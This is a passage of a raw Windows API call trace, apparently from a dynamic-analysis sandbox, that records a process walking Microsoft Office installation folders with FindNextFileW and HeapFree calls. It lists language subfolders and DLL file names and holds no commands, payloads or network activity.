ftLastAccessTime.dwLowDateTime=0xf80afe67, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf80afe67, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xee40, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="mashupcompression.dll", cAlternateFileName="MASHUP~1.DLL")) returned 1 [0183.305] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44950d0 | out: hHeap=0x680000) returned 1 [0183.305] FindNextFileW (in: hFindFile=0x43a3018, lpFindFileData=0x39deb94 | out: lpFindFileData=0x39deb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf0822be8, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x6b61d36, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6b61d36, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="nl", cAlternateFileName="")) returned 1 [0183.307] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44950d0 | out: hHeap=0x680000) returned 1 [0183.307] FindNextFileW (in: hFindFile=0x43a3018, lpFindFileData=0x39deb94 | out: lpFindFileData=0x39deb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf4409f1c, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x8680a1e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x8680a1e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="no", cAlternateFileName="")) returned 1 [0183.309] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44950d0 | out: hHeap=0x680000) returned 1 [0183.309] FindNextFileW (in: hFindFile=0x43a3018, lpFindFileData=0x39deb94 | out: lpFindFileData=0x39deb94*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfa879350, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfa879350, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfa8eba59, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x6daa8, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Office.dll", cAlternateFileName="")) returned 1 [0183.311] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44950d0 | out: hHeap=0x680000) returned 1 [0183.311] FindNextFileW (in: hFindFile=0x43a3018, lpFindFileData=0x39deb94 | out: lpFindFileData=0x39deb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf755cb7d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x6bfa6d9, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6bfa6d9, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="pt-BR", cAlternateFileName="")) returned 1 [0183.314] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44950d0 | out: hHeap=0x680000) returned 1 [0183.314] FindNextFileW (in: hFindFile=0x43a3018, lpFindFileData=0x39deb94 | out: lpFindFileData=0x39deb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf4ba375b, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x6e5cc4e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6e5cc4e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="pt-pt", cAlternateFileName="")) returned 1 [0183.316] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44950d0 | out: hHeap=0x680000) returned 1 [0183.316] FindNextFileW (in: hFindFile=0x43a3018, lpFindFileData=0x39deb94 | out: lpFindFileData=0x39deb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf0063153, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x6e5cc4e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6e5cc4e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="ro", cAlternateFileName="")) returned 1 [0183.318] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44950d0 | out: hHeap=0x680000) returned 1 [0183.318] FindNextFileW (in: hFindFile=0x43a3018, lpFindFileData=0x39deb94 | out: lpFindFileData=0x39deb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf13037fa, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf71003, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf71003, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="ru", cAlternateFileName="")) returned 1 [0183.320] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44950d0 | out: hHeap=0x680000) returned 1 [0183.320] FindNextFileW (in: hFindFile=0x43a3018, lpFindFileData=0x39deb94 | out: lpFindFileData=0x39deb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf42b29f3, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x865a7d2, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x865a7d2, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="sk", cAlternateFileName="")) returned 1 [0183.322] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44950d0 | out: hHeap=0x680000) returned 1 [0183.322] FindNextFileW (in: hFindFile=0x43a3018, lpFindFileData=0x39deb94 | out: lpFindFileData=0x39deb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1ae94c9, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x633d60, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x633d60, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="sl", cAlternateFileName="")) returned 1 [0183.324] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44950d0 | out: hHeap=0x680000) returned 1 [0183.324] FindNextFileW (in: hFindFile=0x43a3018, lpFindFileData=0x39deb94 | out: lpFindFileData=0x39deb94*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x95505c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x95505c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x133819a5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x45c38, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="sqmapi_x64.dll", cAlternateFileName="SQMAPI~1.DLL")) returned 1 [0183.326] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44950d0 | out: hHeap=0x680000) returned 1 [0183.326] FindNextFileW (in: hFindFile=0x43a3018, lpFindFileData=0x39deb94 | out: lpFindFileData=0x39deb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf6aee686, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x6d05722, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6d05722, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="sr-Latn", cAlternateFileName="")) returned 1 [0183.328] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44950d0 | out: hHeap=0x680000) returned 1 [0183.328] FindNextFileW (in: hFindFile=0x43a3018, lpFindFileData=0x39deb94 | out: lpFindFileData=0x39deb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf42b29f3, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x865a7d2, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x865a7d2, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="sr-Latn-CS", cAlternateFileName="SR-LAT~1")) returned 1 [0183.330] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44950d0 | out: hHeap=0x680000) returned 1 [0183.330] FindNextFileW (in: hFindFile=0x43a3018, lpFindFileData=0x39deb94 | out: lpFindFileData=0x39deb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa25d2ba, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x670f8d9, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x670f8d9, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="sv", cAlternateFileName="")) returned 1 [0183.337] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44950d0 | out: hHeap=0x680000) returned 1 [0183.337] FindNextFileW (in: hFindFile=0x43a3018, lpFindFileData=0x39deb94 | out: lpFindFileData=0x39deb94*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf6cde4ae, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf6cde4ae, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6cde4ae, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x1c2b0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="System.Spatial.NetFX35.dll", cAlternateFileName="SYSTEM~1.DLL")) returned 1 [0184.596] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44950d0 | out: hHeap=0x680000) returned 1 [0184.596] FindNextFileW (in: hFindFile=0x43a3018, lpFindFileData=0x39deb94 | out: lpFindFileData=0x39deb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa8eba59, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x453c2a7, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x453c2a7, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="tr", cAlternateFileName="")) returned 1 [0184.598] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44950d0 | out: hHeap=0x680000) returned 1 [0184.598] FindNextFileW (in: hFindFile=0x43a3018, lpFindFileData=0x39deb94 | out: lpFindFileData=0x39deb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xefd8e49f, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x37f90ac, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x37f90ac, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="uk", cAlternateFileName="")) returned 1 [0184.601] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44950d0 | out: hHeap=0x680000) returned 1 [0184.601] FindNextFileW (in: hFindFile=0x43a3018, lpFindFileData=0x39deb94 | out: lpFindFileData=0x39deb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf4692737, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x4abf9f4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x4abf9f4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="vi", cAlternateFileName="")) returned 1 [0184.602] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44950d0 | out: hHeap=0x680000) returned 1 [0184.602] FindNextFileW (in: hFindFile=0x43a3018, lpFindFileData=0x39deb94 | out: lpFindFileData=0x39deb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1e56af1, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x680214, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x680214, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="zh-HANS", cAlternateFileName="")) returned 1 [0184.604] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44950d0 | out: hHeap=0x680000) returned 1 [0184.604] FindNextFileW (in: hFindFile=0x43a3018, lpFindFileData=0x39deb94 | out: lpFindFileData=0x39deb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf00af60a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfa5581c0, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfa5581c0, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="zh-HANT", cAlternateFileName="")) returned 1 [0184.606] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44950d0 | out: hHeap=0x680000) returned 1 [0184.606] FindNextFileW (in: hFindFile=0x43a3018, lpFindFileData=0x39deb94 | out: lpFindFileData=0x39deb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf00af60a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfa5581c0, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfa5581c0, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="zh-HANT", cAlternateFileName="")) returned 0 [0184.606] FindClose (in: hFindFile=0x43a3018 | out: hFindFile=0x43a3018) returned 1 [0184.606] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44850c8 | out: hHeap=0x680000) returned 1 [0184.606] FindNextFileW (in: hFindFile=0x43a2fd8, lpFindFileData=0x39dee10 | out: lpFindFileData=0x39dee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xefd42039, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x895576a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x895576a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="bin", cAlternateFileName="")) returned 0 [0184.607] FindClose (in: hFindFile=0x43a2fd8 | out: hFindFile=0x43a2fd8) returned 1 [0184.607] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43e5098 | out: hHeap=0x680000) returned 1 [0184.613] FindNextFileW (in: hFindFile=0x43a2dd8, lpFindFileData=0x39df08c | out: lpFindFileData=0x39df08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1992fb3, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1992fb3, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x2283d0f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3688, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="MSOSEC.DLL", cAlternateFileName="")) returned 1 [0184.616] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43e5098 | out: hHeap=0x680000) returned 1 [0184.616] FindNextFileW (in: hFindFile=0x43a2dd8, lpFindFileData=0x39df08c | out: lpFindFileData=0x39df08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xefd42039, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x1525a179, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1525a179, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Power View Excel Add-in", cAlternateFileName="POWERV~1")) returned 1 [0184.621] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44850c8 | out: hHeap=0x680000) returned 1 [0184.621] FindNextFileW (in: hFindFile=0x43a2fd8, lpFindFileData=0x39dee10 | out: lpFindFileData=0x39dee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf12dd5ae, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x133819a5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x133819a5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="bg", cAlternateFileName="")) returned 1 [0184.623] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44850c8 | out: hHeap=0x680000) returned 1 [0184.623] FindNextFileW (in: hFindFile=0x43a2fd8, lpFindFileData=0x39dee10 | out: lpFindFileData=0x39dee10*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x133a7bf5, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x133a7bf5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x133cde53, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4090, dwReserved0=0x0, dwReserved1=0x0, cFileName="BI-Report.png", cAlternateFileName="BI-REP~1.PNG")) returned 1 [0184.625] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44850c8 | out: hHeap=0x680000) returned 1 [0184.625] FindNextFileW (in: hFindFile=0x43a2fd8, lpFindFileData=0x39dee10 | out: lpFindFileData=0x39dee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9a9d821, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x133cde53, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x133cde53, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="cs", cAlternateFileName="")) returned 1 [0184.627] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44850c8 | out: hHeap=0x680000) returned 1 [0184.627] FindNextFileW (in: hFindFile=0x43a2fd8, lpFindFileData=0x39dee10 | out: lpFindFileData=0x39dee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6a6473, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1341a2e5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1341a2e5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="da", cAlternateFileName="")) returned 1 [0184.629] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44850c8 | out: hHeap=0x680000) returned 1 [0184.629] FindNextFileW (in: hFindFile=0x43a2fd8, lpFindFileData=0x39dee10 | out: lpFindFileData=0x39dee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf6354def, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x133f40a9, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x133f40a9, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="de", cAlternateFileName="")) returned 1 [0184.630] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44850c8 | out: hHeap=0x680000) returned 1 [0184.631] FindNextFileW (in: hFindFile=0x43a2fd8, lpFindFileData=0x39dee10 | out: lpFindFileData=0x39dee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf46b8986, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x1341a2e5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1341a2e5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="el", cAlternateFileName="")) returned 1 [0184.634] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44850c8 | out: hHeap=0x680000) returned 1 [0184.634] FindNextFileW (in: hFindFile=0x43a2fd8, lpFindFileData=0x39dee10 | out: lpFindFileData=0x39dee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf7582db3, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x1341a2e5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1341a2e5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="es", cAlternateFileName="")) returned 1 [0184.636] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44850c8 | out: hHeap=0x680000) returned 1 [0184.636] FindNextFileW (in: hFindFile=0x43a2fd8, lpFindFileData=0x39dee10 | out: lpFindFileData=0x39dee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1b0f72e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x13440553, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x13440553, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="et", cAlternateFileName="")) returned 1 [0184.637] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44850c8 | out: hHeap=0x680000) returned 1 [0184.637] FindNextFileW (in: hFindFile=0x43a2fd8, lpFindFileData=0x39dee10 | out: lpFindFileData=0x39dee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf6d2a978, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x1341a2e5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1341a2e5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="eu", cAlternateFileName="")) returned 1 [0184.860] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44850c8 | out: hHeap=0x680000) returned 1 [0184.860] FindNextFileW (in: hFindFile=0x43a2fd8, lpFindFileData=0x39dee10 | out: lpFindFileData=0x39dee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf18f9628, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x138defa8, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x138defa8, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="fi", cAlternateFileName="")) returned 1 [0184.862] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44850c8 | out: hHeap=0x680000) returned 1 [0184.862] FindNextFileW (in: hFindFile=0x43a2fd8, lpFindFileData=0x39dee10 | out: lpFindFileData=0x39dee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1ae94c9, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x13440553, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x13440553, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="fr", cAlternateFileName="")) returned 1 [0184.921] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44850c8 | out: hHeap=0x680000) returned 1 [0184.921] FindNextFileW (in: hFindFile=0x43a2fd8, lpFindFileData=0x39dee10 | out: lpFindFileData=0x39dee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9ac3a61, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x13aced2b, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x13aced2b, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="gl", cAlternateFileName="")) returned 1 [0184.924] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44850c8 | out: hHeap=0x680000) returned 1 [0184.924] FindNextFileW (in: hFindFile=0x43a2fd8, lpFindFileData=0x39dee10 | out: lpFindFileData=0x39dee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf4a98712, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x13a8299e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x13a8299e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="he", cAlternateFileName="")) returned 1 [0184.926] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44850c8 | out: hHeap=0x680000) returned 1 [0184.926] FindNextFileW (in: hFindFile=0x43a2fd8, lpFindFileData=0x39dee10 | out: lpFindFileData=0x39dee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa806c3d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x1428e945, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1428e945, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="hi", cAlternateFileName="")) returned 1 [0185.039] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44850c8 | out: hHeap=0x680000) returned 1 [0185.039] FindNextFileW (in: hFindFile=0x43a2fd8, lpFindFileData=0x39dee10 | out: lpFindFileData=0x39dee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf7beb2bc, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x13b67741, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x13b67741, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="hr", cAlternateFileName="")) returned 1 [0185.041] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44850c8 | out: hHeap=0x680000) returned 1 [0185.041] FindNextFileW (in: hFindFile=0x43a2fd8, lpFindFileData=0x39dee10 | out: lpFindFileData=0x39dee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf6164f96, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x14648313, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x14648313, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="hu", cAlternateFileName="")) returned 